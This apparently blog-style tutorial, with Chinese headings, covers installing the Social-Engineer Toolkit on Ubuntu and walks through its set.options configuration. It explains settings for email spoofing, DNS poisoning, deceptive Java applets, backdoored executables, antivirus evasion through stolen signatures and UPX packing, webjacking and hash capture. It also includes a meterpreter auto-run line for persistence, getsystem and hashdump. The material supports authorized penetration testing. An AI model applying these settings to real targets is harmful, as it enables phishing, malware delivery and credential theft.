Ubuntu 14.04 安装 Social Engineering Tookit

介绍

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.

安装

git clone git@github.com:trustedsec/social-engineer-toolkit.git

进入目录

sudo ./setup.py install

默认安装目录为/usr/share/setoolkit

运行

sudo setoolkit

修改配置文件

vim ~/.set/set.options

metasploit路径配置

Looking through the configuration options, you can change specific fields to get a desired result. In the first option, you can change the path of where the location of Metasploit is. Metasploit is used for the payload creations, file format bugs, and for the browser exploit sections.

# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3

METASPLOIT_PATH=/pentest/exploits/framework3

选择网卡监听接口

The Ettercap section can be used when you’re on the same subnet as the victims and you want to perform DNS poison attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site or all sites to your malicious server running.

# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT

# EXAMPLE: ETTERCAP_INTERFACE=wlan0

ETTERCAP_INTERFACE=eth0

#

# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)

ETTERCAP_PATH=/usr/share/ettercap

邮件

# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES

SENDMAIL=OFF

Setting the SENDMAIL flag to ON will try starting SENDMAIL, which can spoof source email addresses. This attack only works if the victim’s SMTP server does not perform reverse lookups on the hostname. SENDMAIL must be installed. If your using BackTrack 4, it is installed by default.

web邮件攻击向量

# SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK

WEBATTACK_EMAIL=OFF

When setting the WEBATTACK_EMAIL to ON, it will allow you to send mass emails to the victim while utilizing the Web Attack vector. Traditionally the emailing aspect is only available through the spear-phishing menu however when this is enabled it will add additional functionality for you to be able to email victims with links to help better your attacks.

Java Applet 攻击向量

# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO

# INSTALL —>  JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk

# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk

SELF_SIGNED_APPLET=OFF

The Java Applet Attack vector is the attack with one of the highest rates of success that SET has in its arsenal. To make the attack look more believable, you can turn this flag on which will allow you to sign the Java Applet with whatever name you want. Say your targeting CompanyX, the standard Java Applet is signed by Microsoft, you can sign the applet with CompanyX to make it look more believable. This will require you to install java’s jdk (in Ubuntu its apt-get install sun-java6-jdk or openjdk-6-jdk).

# THIS FLAG WILL SET THE JAVA ID FLAG WITHIN THE JAVA APPLET TO SOMETHING DIFFE$

# THIS COULD BE TO MAKE IT LOOK MORE BELIEVABLE OR FOR BETTER OBFUSCATION

JAVA_ID_PARAM=Secure Java Applet

#

# JAVA APPLET REPEATER OPTION WILL CONTINUE TO PROMPT THE USER WITH THE JAVA AP$

# THE USER HITS CANCEL. THIS MEANS IT WILL BE NON STOP UNTIL RUN IS EXECUTED. T$

# A BETTER SUCCESS RATE FOR THE JAVA APPLET ATTACK

JAVA_REPEATER=ON

When a user gets the java applet warning, they will see the ‘Secure Java Applet’ as the name of the Applet instead of the IP address. This adds a better believability to the java applet. The second option will prompt the user over and over with nagging Java Applet warnings if they hit cancel. This is useful when the user clicks cancel and the attack would be rendered useless, instead it will continue to pop up over and over.

自动探测

# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT

# SET TO AUTODETECT YOUR INTERFACE

AUTO_DETECT=ON

The AUTO_DETECT flag is probably one of the most asked questions in SET. In most cases, SET will grab the interface you use in order to connect out to the Internet and use that as the reverse connection and IP address. Most attacks need to be customized and may not be on the internal network. If you turn this flag to OFF, SET will prompt you with additional questions on setting up the attack. This flag should be used when you want to use multiple interfaces, have an external IP, or you’re in a NAT/Port forwarding scenario.

端口

# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK

# OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80.

WEB_PORT=80

By default the SET web server listens on port 80, if for some reason you need to change this, you can specify an alternative port.

EXE个性化

# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV

# DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE

# YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe

CUSTOM_EXE=src/exe/legit.binary

When using the payload encoding options of SET, the best option for Anti-Virus bypass is the backdoored, or loaded with a malicious payload hidden in the exe, executable option. Specifically an exe is backdoored with a Metasploit based payload and can generally evade most AV’s out there. SET has an executable built into it for the backdooring of the exe however if for some reason you want to use a different executable, you can specify the path to that exe with the CUSTOM_EXE flag.

Apache服务器设置

# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF

# THE ATTACK VECTOR

APACHE_SERVER=OFF

#

# PATH TO THE APACHE WEBROOT

APACHE_DIRECTORY=/var/www

The web server utilized within SET is a custom-coded web server that at times can be somewhat slow based off of the needs. If you find that you need a boost and want to utilize Apache, you can flip this switch to ON and it will use Apache to handle the web requests and speed your attack up. Note that this attack only works with the Java Applet and Metasploit based attacks. Based on the interception of credentials, Apache cannot be used with the web jacking, tabnabbing, or credential harvester attack methods.

SSL

# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR

WEBATTACK_SSL=OFF

#

# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)

# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT

# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!

#

SELF_SIGNED_CERT=OFF

#

# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK

# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem

PEM_CLIENT=/root/newcert.pem

PEM_SERVER=/root/newreq.pem

In some cases when your performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL based attacks with SET. You will need to turn the WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well however there will be an “untrusted” warning when a victim goes to your website.

webjacking

# TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW

# AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds

WEBJACKING_TIME=2000

The webjacking attack is performed by replacing the victim’s browser with another window that is made to look and appear to be a legitimate site. This attack is very dependant on timing, if your doing it over the Internet, I recommend the delay to be 5000 (5 seconds) otherwise if your internal, 2000 (2 seconds) is probably a safe bet.

command center

# PORT FOR THE COMMAND CENTER

COMMAND_CENTER_PORT=44444

#

# COMMAND CENTER INTERFACE TO BIND TO BY DEFAULT IT IS LOCALHOST ONLY. IF YOU WANT TO ENABLE IT

# SO YOU CAN HIT THE COMMAND CENTER REMOTELY PUT THE INTERFACE TO 0.0.0.0 TO BIND TO ALL INTERFACES.

COMMAND_CENTER_INTERFACE=127.0.0.1

#

# HOW MANY TIMES SET SHOULD ENCODE A PAYLOAD IF YOU ARE USING STANDARD METASPLO$

ENCOUNT=4

The command center is the web GUI interface for the Social-Engineer Toolkit. If you want to use this on a different port, change this number. The next option will specify what interface to listen on for the SET web interface. If it’s set to 127.0.0.1, it eans that no one from outside on the network can hit the web interface. If you place it to 0.0.0.0, it will bind to all interfaces and it can be reached remotely. Be careful with this setting. The encount flag determines how many times a payload will be encoded with Metasploit payloads when in SET. By default it’s 4, but if you require less or more, you can adjust this accordingly.

AUTO MIGRATE

# IF THIS OPTION IS SET, THE METASPLOIT PAYLOADS WILL AUTOMATICALLY MIGRATE TO

# NOTEPAD ONCE THE APPLET IS EXECUTED. THIS IS BENEFICIAL IF THE VICTIM CLOSES

# THE BROWSER HOWEVER CAN INTRODUCE BUGGY RESULTS WHEN AUTO MIGRATING.

AUTO_MIGRATE=OFF

The AUTO_MIGRATE feature will automatically migrate to notepad.exe when a meterpreter shell is spawned. This is especially useful when using browser exploits as it will terminate the session if the browser is closed when using an exploit.

数字签名

# DIGITAL SIGNATURE STEALING METHOD MUST HAVE THE PEFILE PYTHON MODULES LOADED

# FROM http://code.google.com/p/pefile/. BE SURE TO INSTALL THIS BEFORE TURNING

# THIS FLAG ON!!! THIS FLAG GIVES MUCH BETTER AV DETECTION

DIGITAL_SIGNATURE_STEAL=ON

The digital signature stealing method requires the python module called PEFILE which uses a technique used in Disitool by Didier Stevens by taking the digital certificate signed by Microsoft and importing it into a malicious executable. A lot of times this will give better anti-virus detection.

UPX壳

# THESE TWO OPTIONS WILL TURN THE UPX PACKER TO ON AND AUTOMATICALLY ATTEMPT

# TO PACK THE EXECUTABLE WHICH MAY EVADE ANTI-VIRUS A LITTLE BETTER.

UPX_ENCODE=ON

UPX_PATH=/pentest/database/sqlmap/lib/contrib/upx/linux/upx

In addition to digital signature stealing, you can do additional packing by using UPX. This is installed by default on Back|Track linux, if this is set to ON and it does not find it, it will still continue but disable the UPX packing.

Meterpreter

# HERE WE CAN RUN MULTIPLE METERPRETER SCRIPTS ONCE A SESSION IS ACTIVE. THIS

# MAY BE IMPORTANT IF WE ARE SLEEPING AND NEED TO RUN PERSISTENCE, TRY TO ELEVATE

# PERMISSIONS AND OTHER TASKS IN AN AUTOMATED FASHION. FIRST TURN THIS TRIGGER ON

# THEN CONFIGURE THE FLAGS. NOTE THAT YOU NEED TO SEPERATE THE COMMANDS BY A ;

METERPRETER_MULTI_SCRIPT=OFF

#

# WHAT COMMANDS DO YOU WANT TO RUN ONCE A METERPRETER SESSION HAS BEEN ESTABLISHED.

# BE SURE IF YOU WANT MULTIPLE COMMANDS TO SEPERATE WITH A ;. FOR EXAMPLE YOU COULD DO

# run getsystem;run hashdump;run persistence TO RUN THREE DIFFERENT COMMANDS

METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem

The next options can configure once a meterpreter session has been established, what types of commands to automatically run. This would be useful if your getting multiple shells and want to execute specific commands to extract information on the system.

UNC EMBED

# THIS FEATURE WILL AUTO EMBED A IMG SRC TAG TO A UNC PATH OF YOUR ATTACK MACHINE.

# USEFUL IF YOU WANT TO INTERCEPT THE HALF LM KEYS WITH RAINBOWTABLES. WHAT WILL HAPPEN

# IS AS SOON AS THE VICTIM CLICKS THE WEB-PAGE LINK, A UNC PATH WILL BE INITIATED

# AND THE METASPLOIT CAPTURE/SMB MODULE WILL INTERCEPT THE HASH VALUES.

UNC_EMBED=OFF

#

This will automatically embed a UNC path into the web application, when the victim connects to your site, it will try connecting to the server via a file share. When that occurs a challenge response happens and the challenge/responses can be captured and used for attacking.

参考资料

[1] The Social-Engineer Toolkit (SET) - TrustedSec
[2] Beginning with the Social Engineer Toolkit
[3] GitHub:social-engineer-toolkit